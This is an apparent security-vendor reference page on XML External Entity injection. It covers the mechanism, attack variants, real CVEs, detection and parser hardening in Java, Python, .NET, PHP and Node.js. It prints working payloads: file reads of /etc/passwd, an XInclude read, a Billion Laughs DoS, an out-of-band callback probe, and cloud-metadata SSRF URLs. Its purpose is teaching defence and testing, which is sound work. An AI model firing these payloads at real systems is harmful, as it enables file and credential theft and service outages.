High

XXE — XML External Entity Injection

CWE-611A05:2021CVSS 7.512 min

XXE (CWE-611) exploits XML parsers that resolve external entities, enabling file disclosure, SSRF, and RCE in some configurations. One parser flag eliminates the attack class.

External entities in XML DTD let attackers read arbitrary files via file:///etc/passwd — one parser flag eliminates this
Nine variant families: classic file read, blind OOB, error-based local DTD, XInclude, SSRF pivot, SVG/DOCX upload, SAML, XSLT, Billion Laughs DoS
CVE-2025-66516 (Apache Tika PDF/XFA, CVSS 10.0) and CVE-2024-34102 (Adobe Commerce, CVSS 9.8) confirm the attack class is actively exploited
XInclude bypasses DOCTYPE filters — disable entity processing and XInclude independently
Primary defense: disallow-doctype-decl: true (Java) / defusedxml (Python) / DtdProcessing.Prohibit (.NET)

What is XML External Entity Injection?

The XML specification includes a Document Type Definition (DTD) mechanism that allows XML documents to define named entity shortcuts — references that the parser substitutes with their defined value during processing. One variant, external entities, instructs the parser to fetch content from an external URI and inline it into the document. XML External Entity Injection (XXE, CWE-611) occurs when an application parses attacker-controlled XML and a misconfigured parser resolves these external entity references without restriction.

The attack surface is broader than most engineers expect. Beyond traditional REST APIs with Content-Type: application/xml, XXE exists in SOAP services, SAML SSO flows, file upload endpoints accepting SVG and Office formats (DOCX/XLSX/ODT), PDF processors handling XFA forms, RSS/Atom feed parsers, and XML-RPC endpoints. Any code path that passes untrusted XML through an unprotected parser is an XXE entry point.

OWASP classified XXE under A05:2021 (Security Misconfiguration) rather than A03 (Injection) because the root cause is a parser misconfiguration, not a language-level injection flaw. The XML specification itself is not broken — parsers simply ship with external entity resolution enabled by default in many frameworks, and developers rarely explicitly disable it. CVE-2025-66516 (Apache Tika, CVSS 10.0) and CVE-2024-34102 (Adobe Commerce CosmicSting, CVSS 9.8, approximately 170,000 affected stores) demonstrate that XXE remains actively exploited at critical severity in 2025.

Mechanism

The attack exploits the XML parser's entity resolution step. When the parser encounters &entityname; in document content, it looks up the entity definition and substitutes the resolved value. For external entities defined with the SYSTEM keyword, the parser fetches the specified URI and uses its contents as the substitution value.

The exploit chain proceeds in five steps:

The attacker submits XML containing a <!DOCTYPE> declaration defining an external entity: <!ENTITY xxe SYSTEM "file:///etc/passwd">.
The parser encounters the DOCTYPE, parses the entity definition, and records the external URI.
When the parser encounters &xxe; in the document body, it fetches file:///etc/passwd from the local filesystem.
The fetched content is substituted into the parsed document tree.
The application returns the parsed content in the HTTP response, including the file contents.

A minimal exploitation example:

POST /api/products HTTP/1.1
Host: shop.example.com
Content-Type: application/xml
 
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<productSearch>
  <query>&xxe;</query>
</productSearch>

HTTP/1.1 200 OK
Content-Type: application/json
 
{"results": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n..."}

The entity value replaces &xxe; in the <query> element, and the application reflects the parsed value in its response.

Attack Variants

Variant	Technique	Impact	Blind?
Classic file disclosure	`SYSTEM "file:///etc/passwd"` reflected in response	Local file read	No
SSRF via XXE	`SYSTEM "http://169.254.169.254/..."`	Internal network access, cloud metadata theft	Sometimes
Blind OOB	Two-stage parameter entity + external DTD	File exfiltration via DNS/HTTP callback	Yes
Error-based local DTD	Local DTD reuse, file content in error message	File read without OOB infrastructure	No (error channel)
XInclude injection	`xi:include href="file:///etc/passwd"` — no DOCTYPE needed	File read, bypasses DOCTYPE filters	No
SVG upload XXE	Malicious SVG processed by Batik/ImageMagick	Server file read via avatar/image upload	Sometimes
DOCX/XLSX XXE	XML files inside OOXML ZIP archive	Server file read when document is parsed	Sometimes
SAML XXE	XXE in SAML AuthnRequest or metadata	Auth bypass, credentials disclosure	Sometimes
Billion Laughs DoS	Recursive entity expansion (10^9 expansions)	Memory exhaustion, service crash	No

Classic in-band XXE is the simplest form: the entity resolves a file:// URI and the content appears directly in the HTTP response. Any file readable by the application process user is accessible — /etc/passwd, application configuration files, private keys, database credentials.

SSRF via XXE pivots the parser as an HTTP client. Replacing file:// with http:// causes the parser to issue outbound HTTP requests. Against cloud instances, http://169.254.169.254/latest/meta-data/iam/security-credentials/ returns AWS IAM credentials without authentication. Internal services unreachable from the internet are reachable through the XML parser's outbound connection.

Blind OOB XXE applies when the server parses XML but does not return entity content in the HTTP response. Parameter entities make the server fetch an attacker-hosted DTD, which instructs the parser to exfiltrate file content to a second OOB endpoint. BreachVex uses unique out-of-band callback tokens per probe to correlate callbacks with specific payloads.

Error-based local DTD reuse is preferred when OOB infrastructure is unavailable. It references a DTD file that already exists on the target server, redefines a parameter entity within it, and crafts a chain triggering a parse error that contains the target file's contents. Linux systems commonly have /usr/share/yelp/dtd/docbookx.dtd; Windows systems have C:\Windows\System32\wbem\xml\CIM_DTD_V20.dtd.

XInclude injection bypasses defenses that block <!DOCTYPE patterns. XInclude uses namespace-qualified elements (xmlns:xi="http://www.w3.org/2001/XInclude") instead of DOCTYPE declarations. Disabling entity processing does not disable XInclude processing — both must be configured independently.

Billion Laughs DoS exploits recursive internal entity expansion to exhaust parser memory and CPU. No external network access or file:// URI is needed — the attack is self-contained within the DTD:

<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<lolz>&lol4;</lolz>

Four levels of expansion produce ~10,000 "lol" strings; ten levels produce ~10^10 — exhausting memory and CPU before the document finishes parsing. defusedxml blocks this by default; lxml requires huge_tree=False; Java requires setFeature("http://javax.xml.XMLConstants/feature/secure-processing", true).

Real-World Examples

CVE-2024-34102 — Adobe Commerce CosmicSting (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

The most widely exploited XXE vulnerability of 2024. Adobe Commerce's REST API accepted XML bodies without disabling external entity resolution. Sansec researchers demonstrated a five-step RCE chain: XXE reads app/etc/env.php → extracts crypt/key → forges admin JWT → admin REST API → code-on-demand RCE. Approximately 170,000 unpatched stores were vulnerable. Within 72 hours of public disclosure, threat actors compromised more than 4,275 e-commerce stores. The attack required no authentication and no user interaction. CVE-2024-34102 was presented at Black Hat USA 2024 and remains the canonical example of XXE chaining to full system compromise.

CVE-2025-66516 — Apache Tika PDF/XFA (CVSS 10.0)

Apache Tika is the most widely used server-side content extraction library, powering document ingestion in enterprise search, RAG pipelines, and file processing services. Versions before 3.2.2 processed XFA (XML Forms Architecture) content inside PDF documents without disabling external entity resolution. Any application using Tika to process attacker-supplied PDFs is vulnerable — including AI document ingestion pipelines, which represent a new high-value attack surface. Upgrade to Apache Tika 3.2.2 or later.

CVE-2024-22024 — Ivanti Connect Secure SAML (CVSS 8.3)

Ivanti's VPN product processed SAML AuthnRequests at /dana-na/auth/saml-sso.cgi without disabling external entity resolution. The same product was simultaneously vulnerable to CVE-2023-46805 (authentication bypass) — chained, these two CVEs enabled unauthenticated RCE against thousands of enterprise VPN concentrators deployed globally.

CVE-2024-45409 — ruby-saml (CVSS 10.0)

GitHub Security Lab discovered that ruby-saml (used by GitLab and thousands of Ruby applications) was vulnerable to SAML assertion forgery via XML parser differential. Nokogiri (signature verification) and REXML (claim extraction) parse the same XML document differently. An attacker crafts a document passing Nokogiri signature verification but presenting forged claims to REXML — achieving authentication bypass with no traditional injection in the document. CVE-2025-25292 is a second variant of the same differential, published in 2025.

HackerOne #1113539 — Rockstar Games XLSX Import (High)

An Excel import feature on the Rockstar Games web portal processed .xlsx files server-side. The attacker modified the XML files inside the OOXML ZIP archive to inject XXE payloads. When uploaded and processed, the server made OOB callbacks confirming XXE, then disclosed server-side file contents via in-band payloads.

HackerOne #409370 — Shopify SAML XXE (Critical)

Shopify's SAML SSO authentication flow parsed XML assertions without disabling external entity resolution. The attacker provided a crafted SAML response with an OOB XXE payload, which triggered file read callbacks from Shopify's application servers.

CosmicSting (CVE-2024-34102) pattern: XXE does not need to directly return file contents to cause critical impact. The RCE chain reads a configuration file, extracts a cryptographic key, and forges admin authentication tokens — a three-step path from XXE to full system compromise with no user interaction required. Always assess the full impact chain, not just the file read primitive.

Detection

Manual Testing

Identify all XML entry points: REST APIs with Content-Type: application/xml, SOAP services (/ws/, /soap/, /services/), SAML SSO endpoints, file upload flows accepting SVG/DOCX/XLSX/ODT/PDF, RSS/Atom feeds, and XML-RPC.
Send a baseline probe to confirm XML acceptance:
```
<?xml version="1.0" encoding="UTF-8"?>
<root><data>test</data></root>
```
A 415 Unsupported Media Type response means XML is rejected. Any other status indicates the endpoint processes XML.
Test entity expansion with an in-band canary:
```
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY test "XXECANARY123">]>
<root><data>&test;</data></root>
```
If XXECANARY123 appears in the response, entity expansion is active.

Attempt SYSTEM entity file read:

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root><data>&xxe;</data></root>

File contents in the response confirm classic in-band XXE.

For blind contexts, use Interactsh or Burp Collaborator:

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://YOUR-TOKEN.oast.pro/probe"> %xxe;]>
<root/>

Test XInclude independently:

<root xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</root>

Automated Detection

Burp Suite Pro active scanner includes XXE checks using Burp Collaborator for OOB detection across XML endpoints, SOAP services, and file upload flows.

XXEinjector (Ruby) automates in-band and OOB XXE testing with payloads for multiple content types and file formats.

Nuclei templates (vulnerabilities/xxe/) include CVE-specific XXE templates. Custom templates can target application-specific XML endpoints.

Semgrep static rules python.lang.security.audit.xml-dtd and java.lang.security.audit.xxe flag unsafe parser configurations before deployment.

BreachVex detects XXE through a staged sequence of complementary checks: XML acceptance, entity-expansion canary, SYSTEM-entity file read, out-of-band callback correlation, and error-based local-DTD probing on known OS paths. Lower-signal results (DNS-only callbacks) are flagged for review, while data-exfiltration evidence is auto-reported.

Prevention

Disabling external entity processing at the parser level eliminates classic XXE, blind OOB XXE, error-based XXE, and Billion Laughs DoS with a single configuration change. XInclude must be disabled separately.

Java (JAXP — DocumentBuilderFactory)

// VULNERABLE — default DocumentBuilderFactory resolves external entities
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
DocumentBuilder db = dbf.newDocumentBuilder();
Document doc = db.parse(inputStream);  // XXE possible
 
// SAFE — disable DOCTYPE entirely (blocks all XXE + DoS vectors)
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
dbf.setXIncludeAware(false);        // also disables XInclude
dbf.setExpandEntityReferences(false);
DocumentBuilder db = dbf.newDocumentBuilder();
Document doc = db.parse(inputStream);  // XXE blocked

Python (defusedxml — recommended)

# NOTE: xml.etree.ElementTree raises ExpatError on external entity declarations —
# it does NOT resolve external entities (safe for XXE). However, it is vulnerable
# to Billion Laughs DoS via recursive internal entity expansion.
# Use defusedxml for belt-and-suspenders protection against both XXE and DoS.
import xml.etree.ElementTree as ET
tree = ET.parse(untrusted_xml)  # safe for XXE; vulnerable to Billion Laughs DoS
 
# SAFE — defusedxml blocks all XXE patterns AND Billion Laughs DoS
from defusedxml import ElementTree as ET
tree = ET.parse(untrusted_xml)   # all XXE patterns blocked by default
 
# SAFE — lxml with explicit hardening
from lxml import etree
parser = etree.XMLParser(
    resolve_entities=False,
    no_network=True,
    load_dtd=False,
    huge_tree=False,              # blocks Billion Laughs DoS
)
tree = etree.fromstring(xml_bytes, parser=parser)

.NET (XmlDocument / XmlReader)

// VULNERABLE — .NET 4.5.2 and earlier: XmlResolver defaults to XmlUrlResolver
var doc = new XmlDocument();
doc.Load(inputStream);  // XXE possible on older .NET
 
// SAFE — explicitly null the resolver
var doc = new XmlDocument { XmlResolver = null };
doc.Load(inputStream);  // blocks external entity resolution
 
// SAFE — XmlReader with DTD prohibition (preferred for streaming)
var settings = new XmlReaderSettings {
    DtdProcessing = DtdProcessing.Prohibit,
    XmlResolver = null,
    MaxCharactersFromEntities = 0  // blocks Billion Laughs
};
using var reader = XmlReader.Create(inputStream, settings);

PHP

// VULNERABLE — LIBXML_NOENT enables entity substitution
$dom = new DOMDocument();
$dom->loadXML($xml, LIBXML_NOENT);  // LIBXML_NOENT is dangerous
 
// SAFE — LIBXML_NONET blocks network entities (does not block file://)
$dom = new DOMDocument();
$dom->loadXML($xml, LIBXML_NONET);
 
// SAFE (PHP < 8.0) — disable external entity loading globally
libxml_disable_entity_loader(true);
$dom = new DOMDocument();
$dom->loadXML($xml);
// PHP 8.0+: external entity loading is disabled by default for DOMDocument
// but SimpleXML and XMLReader still require explicit LIBXML_NONET flag

Node.js (fast-xml-parser)

// fast-xml-parser: 15M+ weekly downloads — most common Node.js XML library
 
// VULNERABLE — older default config may process entities
const { XMLParser } = require('fast-xml-parser');
const parser = new XMLParser();
const result = parser.parse(xmlString);
 
// SAFE — disable entity processing explicitly (fast-xml-parser >= 4.2.0)
const { XMLParser } = require('fast-xml-parser');
const parser = new XMLParser({
    processEntities: false,  // disables entity substitution
    htmlEntities: false,     // disables HTML entity processing
});
const result = parser.parse(xmlString);

Egress filtering as defense-in-depth: Restricting outbound connections from XML-processing services blocks OOB data exfiltration for blind XXE and SSRF pivots. This does not prevent file:// reads, but it eliminates the attacker's ability to receive exfiltrated data via DNS/HTTP callbacks. ModSecurity CRS rules 942100-942130 add WAF-layer detection for XML attack patterns. Neither control replaces parser hardening — both add depth.

Resources

Frequently Asked Questions

What is XML External Entity (XXE) injection?

XXE injection occurs when an XML parser resolves external entity references embedded in attacker-controlled input. The XML DTD specification allows entities that reference external URIs — when the parser fetches those URIs, it enables file read (file:///etc/passwd), SSRF (http://internal-service/), and in some configurations RCE. CWE-611 classifies this as Improper Restriction of XML External Entity Reference. OWASP absorbed XXE into A05:2021 (Security Misconfiguration) because vulnerable parsers almost always ship misconfigured, not broken.

What is the difference between XXE and SSRF?

XXE and SSRF are distinct vulnerability classes that chain together. XXE is an XML parsing flaw that forces the server to resolve an external entity pointing to any URI scheme (file://, http://, ftp://, gopher://). When that URI points to an internal service, the XXE becomes a SSRF pivot — the XML parser acts as the HTTP client. SSRF can also occur independently without any XML involvement. XXE-to-SSRF is a chain, not a synonym.

What OWASP category covers XXE in 2025?

XXE is classified under OWASP Top 10 A05:2021 — Security Misconfiguration. Prior to the 2021 update, XXE had its own category (A04:2017). The reclassification reflects that XXE is not a design flaw in the XML specification itself, but a configuration failure — parsers ship with external entity resolution enabled by default in many frameworks, and developers fail to disable it.

Which XML parsers are vulnerable to XXE by default?

Java's DocumentBuilderFactory and SAXParserFactory (pre-Java 17 defaults), PHP's DOMDocument when using LIBXML_NOENT flag, Python's stdlib xml.etree and xml.minidom (all versions), Node.js libxmljs2 without explicit noent:false, .NET XmlDocument with XmlResolver not set to null, and Ruby's Nokogiri with noent option. Safe alternatives: Java (disable DOCTYPE), Python (defusedxml), PHP (LIBXML_NONET without LIBXML_NOENT), .NET (XmlReaderSettings with DtdProcessing.Prohibit).

Can XXE lead to Remote Code Execution?

XXE can chain to RCE through several paths: (1) CosmicSting (CVE-2024-34102) — XXE reads app/etc/env.php, extracts crypt key, forges admin JWT, then code-on-demand RCE; (2) XSLT extension functions — PHP XSL with registerPHPFunctions() allows XSLT to call arbitrary PHP functions including system(); (3) SAML XXE reads Kerberos keytab for offline cracking to AD admin; (4) XXE reads database credentials for application-layer privilege escalation. Direct RCE from XXE alone is rare — it usually requires a vulnerable application logic chain.

What is blind OOB XXE?

Blind OOB (Out-of-Band) XXE occurs when the XML parser resolves external entities but the server does not return entity content in the HTTP response. Attackers use two-stage parameter entity chains: the target server fetches an attacker-hosted DTD, which instructs the parser to exfiltrate file content to a second OAST callback URL. Tools like Interactsh (oast.pro) or Burp Collaborator capture the DNS and HTTP callbacks. DNS-only callback indicates POTENTIAL (confidence 0.30); HTTP with data confirms CONFIRMED (0.98).

What is error-based XXE with local DTD reuse?

Error-based local DTD reuse is an XXE technique that requires no external OOB infrastructure. It references a DTD file already on the target server filesystem (e.g., /usr/share/yelp/dtd/docbookx.dtd on Linux), redefines a parameter entity from that DTD, and crafts a chain that causes the parser to include file content in an error message. This technique is valuable in environments with strict egress filtering blocking OOB callbacks.

How do I test for XXE manually?

1. Send a benign XML probe — if not 415, XML is accepted. 2. Inject a local entity canary: <!DOCTYPE foo [<!ENTITY test 'XXECANARY'>]><root>&test;</root> — if XXECANARY appears in response, entity expansion is active. 3. Test SYSTEM entity: file:///etc/passwd in entity value — file contents confirm classic XXE. 4. For blind: use Interactsh URL in entity value and monitor for DNS/HTTP callbacks. 5. Test XInclude separately with xi:include element.

What is XInclude injection and why is it different from classic XXE?

XInclude is a W3C standard for XML document composition that allows including external files using xi:include elements — without requiring a DOCTYPE declaration. An attacker who can inject XML content can use XInclude to read files, bypassing defenses that block DOCTYPE-based XXE. XInclude must be explicitly disabled via setXIncludeAware(false) in Java — disabling DOCTYPE alone is insufficient.

How does file upload XXE work?

File upload XXE occurs when an application accepts XML-based file formats (SVG, DOCX, XLSX, ODT, PDF with XFA) and processes them server-side. SVG files are processed by Apache Batik. DOCX/XLSX files contain XML inside OOXML ZIP archives processed by Apache POI or openpyxl. PDF with XFA forms is processed by Apache Tika (CVE-2025-66516, CVSS 10.0). The attack requires no modification of HTTP headers — only the file content matters.

What is the single most effective XXE prevention?

Disable DOCTYPE processing entirely at the parser level. In Java JAXP: setFeature('http://apache.org/xml/features/disallow-doctype-decl', true). In Python: use defusedxml instead of stdlib xml modules — it blocks all XXE patterns by default. In .NET: set DtdProcessing = DtdProcessing.Prohibit and XmlResolver = null. In PHP: never pass LIBXML_NOENT; use LIBXML_NONET. This single configuration change eliminates classic XXE, blind OOB XXE, error-based XXE, and Billion Laughs DoS simultaneously. XInclude must be disabled separately.

What CVEs represent the most severe XXE vulnerabilities in 2024-2025?

By CVSS severity: CVE-2025-66516 (Apache Tika PDF/XFA, CVSS 10.0), CVE-2024-45409 (ruby-saml SAML bypass, CVSS 10.0), CVE-2024-34102 (Adobe Commerce CosmicSting, CVSS 9.8 — most exploited XXE of 2024, 170,000+ affected stores), CVE-2025-49493 (Akamai CloudTest SOAP, CVSS 9.1), CVE-2024-22024 (Ivanti Connect Secure SAML, CVSS 8.3), CVE-2025-13096 (IBM BAW, CVSS 8.2), CVE-2024-30043 (SharePoint, CVSS 6.5).

Does switching from XML to JSON eliminate XXE?

Yes — JSON parsers do not implement the DTD/entity system that enables XXE. If an application can migrate from XML to JSON for its API, XXE is eliminated at the architecture level. However, XML cannot be avoided in SAML assertions, Office document formats (DOCX/XLSX), SVG images, RSS/Atom feeds, SOAP services, and enterprise integration protocols. For those contexts, parser hardening is mandatory.

Related vulnerabilities

High

XXE — XML External Entity Injection

CWE-611A05:2021CVSS 7.512 min

XXE (CWE-611) exploits XML parsers that resolve external entities, enabling file disclosure, SSRF, and RCE in some configurations. One parser flag eliminates the attack class.

External entities in XML DTD let attackers read arbitrary files via file:///etc/passwd — one parser flag eliminates this
Nine variant families: classic file read, blind OOB, error-based local DTD, XInclude, SSRF pivot, SVG/DOCX upload, SAML, XSLT, Billion Laughs DoS
CVE-2025-66516 (Apache Tika PDF/XFA, CVSS 10.0) and CVE-2024-34102 (Adobe Commerce, CVSS 9.8) confirm the attack class is actively exploited
XInclude bypasses DOCTYPE filters — disable entity processing and XInclude independently
Primary defense: disallow-doctype-decl: true (Java) / defusedxml (Python) / DtdProcessing.Prohibit (.NET)

What is XML External Entity Injection?

Mechanism

The exploit chain proceeds in five steps:

The attacker submits XML containing a <!DOCTYPE> declaration defining an external entity: <!ENTITY xxe SYSTEM "file:///etc/passwd">.
The parser encounters the DOCTYPE, parses the entity definition, and records the external URI.
When the parser encounters &xxe; in the document body, it fetches file:///etc/passwd from the local filesystem.
The fetched content is substituted into the parsed document tree.
The application returns the parsed content in the HTTP response, including the file contents.

A minimal exploitation example:

POST /api/products HTTP/1.1
Host: shop.example.com
Content-Type: application/xml
 
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<productSearch>
  <query>&xxe;</query>
</productSearch>

HTTP/1.1 200 OK
Content-Type: application/json
 
{"results": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n..."}

The entity value replaces &xxe; in the <query> element, and the application reflects the parsed value in its response.

Attack Variants

Variant	Technique	Impact	Blind?
Classic file disclosure	`SYSTEM "file:///etc/passwd"` reflected in response	Local file read	No
SSRF via XXE	`SYSTEM "http://169.254.169.254/..."`	Internal network access, cloud metadata theft	Sometimes
Blind OOB	Two-stage parameter entity + external DTD	File exfiltration via DNS/HTTP callback	Yes
Error-based local DTD	Local DTD reuse, file content in error message	File read without OOB infrastructure	No (error channel)
XInclude injection	`xi:include href="file:///etc/passwd"` — no DOCTYPE needed	File read, bypasses DOCTYPE filters	No
SVG upload XXE	Malicious SVG processed by Batik/ImageMagick	Server file read via avatar/image upload	Sometimes
DOCX/XLSX XXE	XML files inside OOXML ZIP archive	Server file read when document is parsed	Sometimes
SAML XXE	XXE in SAML AuthnRequest or metadata	Auth bypass, credentials disclosure	Sometimes
Billion Laughs DoS	Recursive entity expansion (10^9 expansions)	Memory exhaustion, service crash	No

<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<lolz>&lol4;</lolz>

Real-World Examples

CVE-2024-34102 — Adobe Commerce CosmicSting (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

CVE-2025-66516 — Apache Tika PDF/XFA (CVSS 10.0)

CVE-2024-22024 — Ivanti Connect Secure SAML (CVSS 8.3)

CVE-2024-45409 — ruby-saml (CVSS 10.0)

HackerOne #1113539 — Rockstar Games XLSX Import (High)

HackerOne #409370 — Shopify SAML XXE (Critical)

Detection

Manual Testing

Identify all XML entry points: REST APIs with Content-Type: application/xml, SOAP services (/ws/, /soap/, /services/), SAML SSO endpoints, file upload flows accepting SVG/DOCX/XLSX/ODT/PDF, RSS/Atom feeds, and XML-RPC.
Send a baseline probe to confirm XML acceptance:
```
<?xml version="1.0" encoding="UTF-8"?>
<root><data>test</data></root>
```
A 415 Unsupported Media Type response means XML is rejected. Any other status indicates the endpoint processes XML.
Test entity expansion with an in-band canary:
```
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY test "XXECANARY123">]>
<root><data>&test;</data></root>
```
If XXECANARY123 appears in the response, entity expansion is active.

Attempt SYSTEM entity file read:

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root><data>&xxe;</data></root>

File contents in the response confirm classic in-band XXE.

For blind contexts, use Interactsh or Burp Collaborator:

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://YOUR-TOKEN.oast.pro/probe"> %xxe;]>
<root/>

Test XInclude independently:

<root xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</root>

Automated Detection

Burp Suite Pro active scanner includes XXE checks using Burp Collaborator for OOB detection across XML endpoints, SOAP services, and file upload flows.

XXEinjector (Ruby) automates in-band and OOB XXE testing with payloads for multiple content types and file formats.

Nuclei templates (vulnerabilities/xxe/) include CVE-specific XXE templates. Custom templates can target application-specific XML endpoints.

Semgrep static rules python.lang.security.audit.xml-dtd and java.lang.security.audit.xxe flag unsafe parser configurations before deployment.

Prevention

Java (JAXP — DocumentBuilderFactory)

// VULNERABLE — default DocumentBuilderFactory resolves external entities
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
DocumentBuilder db = dbf.newDocumentBuilder();
Document doc = db.parse(inputStream);  // XXE possible
 
// SAFE — disable DOCTYPE entirely (blocks all XXE + DoS vectors)
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
dbf.setXIncludeAware(false);        // also disables XInclude
dbf.setExpandEntityReferences(false);
DocumentBuilder db = dbf.newDocumentBuilder();
Document doc = db.parse(inputStream);  // XXE blocked

Python (defusedxml — recommended)

# NOTE: xml.etree.ElementTree raises ExpatError on external entity declarations —
# it does NOT resolve external entities (safe for XXE). However, it is vulnerable
# to Billion Laughs DoS via recursive internal entity expansion.
# Use defusedxml for belt-and-suspenders protection against both XXE and DoS.
import xml.etree.ElementTree as ET
tree = ET.parse(untrusted_xml)  # safe for XXE; vulnerable to Billion Laughs DoS
 
# SAFE — defusedxml blocks all XXE patterns AND Billion Laughs DoS
from defusedxml import ElementTree as ET
tree = ET.parse(untrusted_xml)   # all XXE patterns blocked by default
 
# SAFE — lxml with explicit hardening
from lxml import etree
parser = etree.XMLParser(
    resolve_entities=False,
    no_network=True,
    load_dtd=False,
    huge_tree=False,              # blocks Billion Laughs DoS
)
tree = etree.fromstring(xml_bytes, parser=parser)

.NET (XmlDocument / XmlReader)

// VULNERABLE — .NET 4.5.2 and earlier: XmlResolver defaults to XmlUrlResolver
var doc = new XmlDocument();
doc.Load(inputStream);  // XXE possible on older .NET
 
// SAFE — explicitly null the resolver
var doc = new XmlDocument { XmlResolver = null };
doc.Load(inputStream);  // blocks external entity resolution
 
// SAFE — XmlReader with DTD prohibition (preferred for streaming)
var settings = new XmlReaderSettings {
    DtdProcessing = DtdProcessing.Prohibit,
    XmlResolver = null,
    MaxCharactersFromEntities = 0  // blocks Billion Laughs
};
using var reader = XmlReader.Create(inputStream, settings);

PHP

// VULNERABLE — LIBXML_NOENT enables entity substitution
$dom = new DOMDocument();
$dom->loadXML($xml, LIBXML_NOENT);  // LIBXML_NOENT is dangerous
 
// SAFE — LIBXML_NONET blocks network entities (does not block file://)
$dom = new DOMDocument();
$dom->loadXML($xml, LIBXML_NONET);
 
// SAFE (PHP < 8.0) — disable external entity loading globally
libxml_disable_entity_loader(true);
$dom = new DOMDocument();
$dom->loadXML($xml);
// PHP 8.0+: external entity loading is disabled by default for DOMDocument
// but SimpleXML and XMLReader still require explicit LIBXML_NONET flag

Node.js (fast-xml-parser)

// fast-xml-parser: 15M+ weekly downloads — most common Node.js XML library
 
// VULNERABLE — older default config may process entities
const { XMLParser } = require('fast-xml-parser');
const parser = new XMLParser();
const result = parser.parse(xmlString);
 
// SAFE — disable entity processing explicitly (fast-xml-parser >= 4.2.0)
const { XMLParser } = require('fast-xml-parser');
const parser = new XMLParser({
    processEntities: false,  // disables entity substitution
    htmlEntities: false,     // disables HTML entity processing
});
const result = parser.parse(xmlString);

Resources

Frequently Asked Questions

What is XML External Entity (XXE) injection?

What is the difference between XXE and SSRF?

What OWASP category covers XXE in 2025?

Which XML parsers are vulnerable to XXE by default?

Can XXE lead to Remote Code Execution?

What is blind OOB XXE?

What is error-based XXE with local DTD reuse?

How do I test for XXE manually?

What is XInclude injection and why is it different from classic XXE?

How does file upload XXE work?

What is the single most effective XXE prevention?

What CVEs represent the most severe XXE vulnerabilities in 2024-2025?

Does switching from XML to JSON eliminate XXE?

XXE — XML External Entity Injection

What is XML External Entity Injection?#

Mechanism#

Attack Variants#

Real-World Examples#

Detection#

Manual Testing#

Automated Detection#

Prevention#

Java (JAXP — DocumentBuilderFactory)#

Python (defusedxml — recommended)#

.NET (XmlDocument / XmlReader)#

PHP#

Node.js (fast-xml-parser)#

Resources#

Frequently Asked Questions

Related vulnerabilities

XXE — XML External Entity Injection

What is XML External Entity Injection?#

Mechanism#

Attack Variants#

Real-World Examples#

Detection#

Manual Testing#

Automated Detection#

Prevention#

Java (JAXP — DocumentBuilderFactory)#

Python (defusedxml — recommended)#

.NET (XmlDocument / XmlReader)#

PHP#

Node.js (fast-xml-parser)#

Resources#

Frequently Asked Questions

Related vulnerabilities

What is XML External Entity Injection?

Mechanism

Attack Variants

Real-World Examples

Detection

Manual Testing

Automated Detection

Prevention

Java (JAXP — DocumentBuilderFactory)

Python (defusedxml — recommended)

.NET (XmlDocument / XmlReader)

PHP

Node.js (fast-xml-parser)

Resources

What is XML External Entity Injection?

Mechanism

Attack Variants

Real-World Examples

Detection

Manual Testing

Automated Detection

Prevention

Java (JAXP — DocumentBuilderFactory)

Python (defusedxml — recommended)

.NET (XmlDocument / XmlReader)

PHP

Node.js (fast-xml-parser)

Resources